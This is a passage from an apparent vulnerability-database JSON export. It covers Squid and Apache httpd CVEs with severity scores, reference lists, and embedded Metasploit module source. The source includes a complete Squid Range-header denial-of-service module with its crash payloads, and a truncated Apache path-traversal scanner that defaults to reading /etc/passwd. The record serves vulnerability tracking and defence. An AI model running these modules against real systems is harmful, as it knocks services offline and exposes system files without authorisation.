"1337DAY-ID-37024", "1337DAY-ID-37030", "1337DAY-ID-37777"]}]}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:72129348AFF386C88DD2D4145C64F678"]}, {"type": "amazon", "idList": ["ALAS-2021-1543", "ALAS2-2021-1716"]}, {"type": "archlinux", "idList": ["ASA-202110-1"]}, {"type": "attackerkb", "idList": ["AKB:0802ECEE-BB4C-4C5B-969C-32CB9808C281", "AKB:0B46025D-A4C7-4FB0-ADA5-7244A30E7D6E", "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70"]}, {"type": "avleonov", "idList": ["AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:99215B2D7808C46D8762AD712CD3D267"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0684", "CPAI-2021-0749"]}, {"type": "cisa", "idList": ["CISA:76FE595B1B89D06301E16CB8087D39BD", "CISA:78B08801DAA7C3B8A2D34A5790730C76", "CISA:82FAB13698D3611E1292062AD6C8B405"]}, {"type": "cisco", "idList": ["CISCO-SA-APACHE-HTTPD-PATHTRV-LAZG68CZ"]}, {"type": "cve", "idList": ["CVE-2020-25223", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-38647", "CVE-2021-41773", "CVE-2021-42013"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2685-1:9A36F", "DEBIAN:DSA-4924-1:931B6"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-41773", "DEBIANCVE:CVE-2021-42013"]}, {"type": "dsquare", "idList": ["E-738", "E-739"]}, {"type": "exploitdb", "idList": ["EDB-ID:50383", "EDB-ID:50406", "EDB-ID:50446", "EDB-ID:50512"]}, {"type": "f5", "idList": ["F5:K04082144"]}, {"type": "fedora", "idList": ["FEDORA:00C4C3098596", "FEDORA:BDD0730B86DF", "FEDORA:C4C0D3091C28", "FEDORA:CC54030AE7DD"]}, {"type": "freebsd", "idList": ["25B78BDD-25B8-11EC-A341-D4C9EF517024", "D001C189-2793-11EC-8FB1-206A8A720317"]}, {"type": "gentoo", "idList": ["GLSA-202105-14"]}, {"type": "githubexploit", "idList": ["04E3583E-DFED-5D0D-BCF2-1C1230EB666D", "09412330-832C-538A-A226-61474048E41B", "0C28A0EC-7162-5D73-BEC9-B034F5392847", "108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2", "11813536-2AFF-5EA4-B09F-E9EB340DDD26", "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "1E6E9010-4BDF-5C30-951C-79C280B90883", "1EC6324C-A18E-517A-9A55-F1C2D1BCA358", "22DCCD26-B68C-5905-BAC2-71D10DE3F123", "24ADD37D-C8A1-5671-A0F4-378760FC69AC", "27108E72-8DC1-53B5-97D9-E869CA13EFF7", "2A177215-CE4A-5FA7-B016-EEAF332D165C", "37A9128D-17C4-50FF-B025-5FC3E0F3F338", "3AE03E90-26EC-5F91-B84E-F04AF6239A9F", "3B159471-590A-5941-ADED-20F4187E8C63", "3C5B500C-1858-5834-9D23-38DBE44AE969", "3CF66144-235E-5F7A-B889-113C11ABF150", "4427DEE4-E1E2-5A16-8683-D74750941604", "44E43BB7-6255-58E7-99C7-C3B84645D497", "45F0EB7B-CE04-5103-9D40-7379AE4B6CDD", "4B44115D-85A3-5E62-B9A8-5F336C24673F", "4B46EB21-DF1F-5D84-AE44-9BCFE311DFB9", "4E4BAF15-6430-514A-8679-5B9F03584B71", "500CE683-17EB-5776-8EF6-85122451B145", "52E13088-9643-5E81-B0A0-B7478BCF1F2C", "5312D04F-9490-5472-84FA-86B3BBDC8928", "54D698B4-9CF0-5D7F-88D2-1053A11EA7C3", "5A54F5DA-F9C1-508B-AD2D-3E45CD647D31", "5D88E443-7AB2-5034-910D-D52A5EFFF5FC", "610ADCD3-C281-52D4-A546-467569FE3AC1", "628A345B-5FD8-5A2F-8782-9125584E4C89", "64DFB465-6754-5E4B-B311-7668EDD4D962", "68A13FF0-60E5-5A29-9248-83A940B0FB02", "68E78C64-D93A-5E8B-9DEA-4A8D826B474E", "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "6C0C909F-3307-5755-97D2-0EBD17367154", "6E104766-2F7A-5A0A-A24B-61D9B52AD4EE", "7248BA4C-3FE5-5529-9E4C-C91E241E8AA0", "789B6112-E84C-566E-89A7-82CC108EFCD9", "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "8217668C-9748-5511-8C01-7E933D69F872", "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "8A14FEAD-A401-5B54-84EB-2059841AD1DD", "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "8B4EDA16-9E27-500D-B648-9C3AD4295562", "8FB9E7A8-9A5B-5D87-9A44-AE4A1A92213D", "987C6FDB-3E70-5FF5-AB5B-D50065D27594", "9D511461-7D24-5402-8E2A-58364D6E758F", "9F5B4253-EC2A-5A25-AB3C-CB76E45F7923", "A1FF76C0-CF98-5704-AEE4-DF6F1E434FA3", "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "A6753173-D2DC-54CC-A5C4-0751E61F0343", "A6B7D4D8-4578-5AD8-961D-3BC35007FF29", "A99AB73C-8E46-5B9C-A402-F78F96EE2327", "A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F", "AD440E9E-3A07-5AB3-99A0-11DD4C08AF47", "B4483895-BA86-5CFB-84F3-7C06411B5175", "B8198D62-F9C8-5E03-A301-9A3580070B4C", "B81BC21D-818E-5B33-96D7-062C14102874", "BF40B403-9D06-5460-8B40-3FC2E56A4A07", "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "C0380E16-C468-5540-A427-7FE34E7CF36B", "C068A003-5258-51DC-A3C0-786638A1B69C", "C26A395B-9695-59E4-908F-866A561936E9", "C8799CA3-C88C-5B39-B291-2895BE0D9133", "C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79", "CD48BD40-E52A-5A8B-AE27-B57C358BB0EE", "CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A", "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "DF57E8F1-FE21-5EB9-8FC7-5F2EA267B09D", "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "E6B39247-8016-5007-B505-699F05FCA1B5", "E9FE319B-26BF-5A75-8C6A-8AE55D7E7615", "ECD5D758-774C-5488-B782-C8996208B401", "F41EE867-4E63-5259-9DF0-745881884D04", "F893E602-F8EB-5D23-8ABF-920890DB23A3", "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "FA1DEEA0-A8AF-5C21-98E6-9D3379266529", "FF610CB4-801A-5D1D-9AC9-ADFC287C8482"]}, {"type": "hackerone", "idList": ["H1:1394916", "H1:1400238", "H1:1404731"]}, {"type": "hivepro", "idList": ["HIVEPRO:7FC9DCD27C78F4BFA53C84B6CB04EC19"]}, {"type": "httpd", "idList": ["HTTPD:2C849FE5B165E832EE21ADAECFA9521C"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:FEBE35B3CF79AFD5E057AF4D43E9C08F"]}, {"type": "jvn", "idList": ["JVN:51106450"]}, {"type": "kaspersky", "idList": ["KLA12286", "KLA12297"]}, {"type": "kitploit", "idList": ["KITPLOIT:1567876964965286721", "KITPLOIT:3027120689321178260", "KITPLOIT:4143386305519508041", "KITPLOIT:4700475362409254459", "KITPLOIT:9205213728263868656"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/APACHE_NORMALIZE_PATH/", "MSF:EXPLOIT/MULTI/HTTP/APACHE_NORMALIZE_PATH_RCE/", "MSF:ILITIES/DEBIAN-CVE-2021-31807/", "MSF:ILITIES/SUSE-CVE-2021-31806/", "MSF:ILITIES/UBUNTU-CVE-2021-31807/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-38647"]}, {"type": "msrc", "idList": ["MSRC:69CC27233CB7711437A7019644E4AE73"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1716.NASL", "ALA_ALAS-2021-1543.NASL", "APACHE_2_4_49_PATH_TRAVERSAL.NBIN", "APACHE_2_4_50.NASL", "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "APACHE_2_4_51.NASL", "AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "CENTOS8_RHSA-2021-4292.NASL", "DEBIAN_DLA-2685.NASL", "DEBIAN_DSA-4924.NASL", "EULEROS_SA-2021-2433.NASL", "EULEROS_SA-2021-2519.NASL", "EULEROS_SA-2021-2618.NASL", "FREEBSD_PKG_25B78BDD25B811ECA341D4C9EF517024.NASL", "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "GENTOO_GLSA-202105-14.NASL", "OMI_1_6_8_1.NASL", "OMI_CVE-2021-38647.NBIN", "OPENSUSE-2021-1961.NASL", "ORACLELINUX_ELSA-2021-4292.NASL", "ORACLELINUX_ELSA-2021-9465.NASL", "REDHAT-RHSA-2021-4292.NASL", "SUSE_SU-2021-1838-1.NASL", "SUSE_SU-2021-1961-1.NASL", "WEB_APPLICATION_SCANNING_113014", "WEB_APPLICATION_SCANNING_113015"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2021-4292", "ELSA-2021-9465"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164418", "PACKETSTORM:164501", "PACKETSTORM:164609", "PACKETSTORM:164629", "PACKETSTORM:164694", "PACKETSTORM:164697", "PACKETSTORM:164925", "PACKETSTORM:164941"]}, {"type": "photon", "idList": ["PHSA-2021-3.0-0269", "PHSA-2021-4.0-0063"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:8D4E5743B0CE5246D493CE7356B4972D", "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046"]}, {"type": "redhat", "idList": ["RHSA-2021:4292"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-31806", "RH:CVE-2021-31807", "RH:CVE-2021-41773", "RH:CVE-2021-42013"]}, {"type": "saint", "idList": ["SAINT:4A73A5CD7FE341977E86117842CBB67D", "SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01"]}, {"type": "slackware", "idList": ["SSA-2021-278-01", "SSA-2021-280-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0879-1", "OPENSUSE-SU-2021:1961-1"]}, {"type": "thn", "idList": ["THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:69DC54E89A77C1E4E0DFE9C6EA3BAB48", "THN:A0816B13A402B9865C624E3CA1B06EA5", "THN:C6F6C1EB007027C65DE14DE5DA3E74BC"]}, {"type": "threatpost", "idList": ["THREATPOST:49DCD8325E10F7898739335BD99AE94B", "THREATPOST:5F0369916D5AFC90C3AF027AC4EC4A61", "THREATPOST:641CEDBD77D5E4711F6E56353D7B5E33", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:8325094507099F4F089C61EF2997445C", "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB"]}, {"type": "ubuntu", "idList": ["USN-4981-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-31806", "UB:CVE-2021-31807", "UB:CVE-2021-41773", "UB:CVE-2021-42013"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:6D3FED0879553B4C47AD26ED1DEB5AEB"]}, {"type": "zdt", "idList": ["1337DAY-ID-36854", "1337DAY-ID-36897", "1337DAY-ID-36937", "1337DAY-ID-36952", "1337DAY-ID-37024", "1337DAY-ID-37030"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-25223", "epss": "0.974660000", "percentile": "0.999210000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31806", "epss": "0.950600000", "percentile": "0.988290000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31807", "epss": "0.008290000", "percentile": "0.793840000", "modified": "2023-03-17"}, {"cve": "CVE-2021-38647", "epss": "0.974860000", "percentile": "0.999410000", "modified": "2023-03-17"}, {"cve": "CVE-2021-41773", "epss": "0.975390000", "percentile": "0.999850000", "modified": "2023-03-17"}, {"cve": "CVE-2021-42013", "epss": "0.975580000", "percentile": "0.999920000", "modified": "2023-03-17"}], "vulnersScore": 0.6}, "_state": {"dependencies": 1660004461, "score": 1659916224, "epss": 1679135269}, "_internal": {"score_hash": "6df7e4210ca545bb90d8859a86d3ce0c"}}
{"ubuntucve": [{"lastseen": "2022-10-26T13:33:47", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An\ninteger overflow problem allows a remote server to achieve Denial of\nService when delivering responses to HTTP Range requests. The issue trigger\nis a header that can be expected to exist in HTTP traffic without any\nmalicious intent.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989043>\n * <https://bugzilla.suse.com/show_bug.cgi?id=1185916>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | same commit as CVE-2021-31806\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-28T00:00:00", "type": "ubuntucve", "title": "CVE-2021-31807", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806", "CVE-2021-31807"], "modified": "2021-05-28T00:00:00", "id": "UB:CVE-2021-31807", "href": "https://ubuntu.com/security/CVE-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T13:15:19", "description": "A flaw was found in a change made to path normalization in Apache HTTP\nServer 2.4.49. An attacker could use a path traversal attack to map URLs to\nfiles outside the directories configured by Alias-like directives. If files\noutside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue is known to be exploited in the wild.\nThis issue only affects Apache 2.4.49 and not earlier versions. The fix in\nApache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "ubuntucve", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-05T00:00:00", "id": "UB:CVE-2021-41773", "href": "https://ubuntu.com/security/CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:15:14", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50\nwas insufficient. An attacker could use a path traversal attack to map URLs\nto files outside the directories configured by Alias-like directives. If\nfiles outside of these directories are not protected by the usual default\nconfiguration \"require all denied\", these requests can succeed. If CGI\nscripts are also enabled for these aliased pathes, this could allow for\nremote code execution. This issue only affects Apache 2.4.49 and Apache\n2.4.50 and not earlier versions.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | Ubuntu wasn't vulnerable to CVE-2021-41773 so we did not deploy the insufficient fix.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "ubuntucve", "title": "CVE-2021-42013", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-07T00:00:00", "id": "UB:CVE-2021-42013", "href": "https://ubuntu.com/security/CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T13:33:55", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a\nmemory-management bug, it is vulnerable to a Denial of Service attack\n(against all clients using the proxy) via HTTP Range request processing.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989043>\n * <https://bugzilla.suse.com/show_bug.cgi?id=1185916>\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-27T00:00:00", "type": "ubuntucve", "title": "CVE-2021-31806", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-05-27T00:00:00", "id": "UB:CVE-2021-31806", "href": "https://ubuntu.com/security/CVE-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "metasploit": [{"lastseen": "2022-11-01T15:53:47", "description": "The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered by specific HTTP requests and responses. These vulnerabilities allow remote attackers to cause a denial of service through specifically crafted requests.\n", "cvss3": {}, "published": "2021-10-07T11:29:56", "type": "metasploit", "title": "Squid Proxy Range Header DoS", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31806", "CVE-2021-31807"], "modified": "2021-10-21T17:15:30", "id": "MSF:AUXILIARY-DOS-HTTP-SQUID_RANGE_DOS-", "href": "https://www.rapid7.com/db/modules/auxiliary/dos/http/squid_range_dos/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Squid Proxy Range Header DoS',\n 'Description' => %q{\n The range handler in The Squid Caching Proxy Server 3.0-4.1.4 and\n 5.0.1-5.0.5 suffers from multiple vulnerabilities triggered\n by specific HTTP requests and responses.\n\n These vulnerabilities allow remote attackers to cause a\n denial of service through specifically crafted requests.\n },\n 'Author' => [\n 'Joshua Rogers' # Discoverer, and Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['DOS', { 'Description' => 'Perform Denial of Service Against The Target' }]\n ],\n 'DefaultAction' => 'DOS',\n 'References' => [\n [ 'CVE', '2021-31806'],\n [ 'CVE', '2021-31807'],\n [ 'URL', 'https://blogs.opera.com/security/2021/10/fuzzing-http-proxies-squid-part-2/']\n ],\n 'DisclosureDate' => '2021-05-27',\n 'Notes' => {\n 'Stability' => [ CRASH_SERVICE_DOWN ],\n 'Reliability' => [ ],\n 'SideEffects' => [ IOC_IN_LOGS ]\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(3128),\n OptInt.new('REQUEST_COUNT', [ true, 'The number of requests to be sent, as well as the number of re-tries to confirm a dead host', 50 ]),\n OptEnum.new('CVE', [\n true, 'CVE to check/exploit', 'CVE-2021-31806',\n ['CVE-2021-31806', 'CVE-2021-31807']\n ]),\n ]\n )\n end\n\n def on_request_uri(cli, _request)\n # The Last-Modified response header must be set such that Squid caches the page.\n send_response(cli, '<html></html>', { 'Last-Modified' => 'Mon, 01 Jan 2020 00:00:00 GMT' })\n end\n\n def run\n count = 0\n error_count = 0 # The amount of connection errors from the server.\n reqs = datastore['REQUEST_COUNT'] # The maximum amount of requests (with a valid response) to the server.\n\n print_status(\"Sending #{reqs} DoS requests to #{peer}\")\n\n start_service\n\n while reqs > count\n begin\n res = req(datastore['CVE'])\n rescue Errno::ECONNRESET\n res = nil\n end\n\n if res && (res.code == 200) && (count == 0)\n count = 1\n print_status(\"Sent first request to #{rhost}:#{rport}\")\n elsif res\n print_status(\"Sent DoS request #{count} to #{rhost}:#{rport}\")\n count += 1\n error_count = 0\n\n next # Host could be completely dead, or just waiting for another Squid child.\n elsif count == 0\n print_error('Cannot connect to host.')\n return\n end\n\n error_count += 1\n next unless error_count > reqs # If we cannot connect after `res` amount of attempts, assume the DoS was successful.\n\n print_good('DoS completely successful.')\n report_vuln(\n host: rhost,\n port: rport,\n name: name,\n refs: references\n )\n return\n end\n print_error('Looks like the host is not vulnerable.')\n end\n\n def req(cve)\n case cve\n when 'CVE-2021-31806'\n sploit = cve_2021_31806\n when 'CVE-2021-31807'\n sploit = cve_2021_31807\n end\n\n send_request_raw({\n 'uri' => get_uri,\n 'headers' => {\n 'Host' => \"#{srvhost_addr}:#{srvport}\",\n 'Range' => sploit,\n 'Cache-Control' => 'public'\n }\n })\n end\n\n def cve_2021_31806\n # This will cause Squid to assert with \"http->out.offset <= start\"\n %(bytes=0-0,-0,-1)\n end\n\n def cve_2021_31807\n # This will cause Squid to assert with \"!http->range_iter.debt() == !http->range_iter.currentSpec()\"\n %(bytes=0-0,-4,-0)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/squid_range_dos.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-01T10:46:09", "description": "This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands (Remote Command Execution). This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T17:00:59", "type": "metasploit", "title": "Apache 2.4.49/2.4.50 Traversal RCE scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-22T16:38:03", "id": "MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_normalize_path/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE scanner',\n 'Description' => %q{\n This module scans for an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n },\n 'Actions' => [\n [\n 'CHECK_TRAVERSAL',\n {\n 'Description' => 'Check for vulnerability.'\n }\n ],\n [\n 'CHECK_RCE',\n {\n 'Description' => 'Check for RCE (if mod_cgi is enabled).'\n }\n ],\n [\n 'READ_FILE',\n {\n 'Description' => 'Read file on the remote server.'\n }\n ]\n ],\n 'DefaultAction' => 'CHECK_TRAVERSAL'\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('FILEPATH', [false, 'File you want to read', '/etc/passwd']),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def exec_traversal(cmd)\n send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => normalize_uri(datastore['TARGETURI'], @traversal.to_s),\n 'data' => 